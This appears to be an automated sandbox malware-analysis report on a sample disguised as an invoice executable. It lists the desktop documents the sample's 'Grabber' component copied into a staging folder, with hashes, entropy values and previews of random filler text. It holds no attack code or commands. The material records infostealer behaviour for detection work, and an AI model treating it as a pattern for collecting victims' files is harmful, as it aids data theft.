Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.pdf

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\NWTVCDUMOB.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\VLZDGUKUTZ.xlsx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\XZXHAVGRAG\XZXHAVGRAG.docx

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69156792375111
Encrypted:	false
SSDEEP:	24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
MD5:	A4E170A8033E4DAE501B5FD3D8AC2B74
SHA1:	589F92029C10058A7B281AA9F2BBFA8C822B5767
SHA-256:	E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
SHA-512:	FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
Malicious:	false
Preview:	XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ZBEDCJPBEY.png

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6994061563025005
Encrypted:	false
SSDEEP:	24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
MD5:	A2EF8D31A8DC8EAFB642142CAE0BDDE5
SHA1:	6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
SHA-256:	A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
SHA-512:	0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
Malicious:	false
Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	282
Entropy (8bit):	3.514693737970008
Encrypted:	false
SSDEEP:	6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlWygDAlLwkAl2FlRaQmZWGokJISlfY:QZsiL5wmHOlDmo0qmWvclLwr2FlDmo0I
MD5:	9E36CC3537EE9EE1E3B10FA4E761045B
SHA1:	7726F55012E1E26CC762C9982E7C6C54CA7BB303
SHA-256:	4B9D687AC625690FD026ED4B236DAD1CAC90EF69E7AD256CC42766A065B50026
SHA-512:	5F92493C533D3ADD10B4CE2A364624817EBD10E32DAA45EE16593E913073602DB5E339430A3F7D2C44ABF250E96CA4E679F1F09F8CA807D58A47CF3D5C9C3790
Malicious:	false
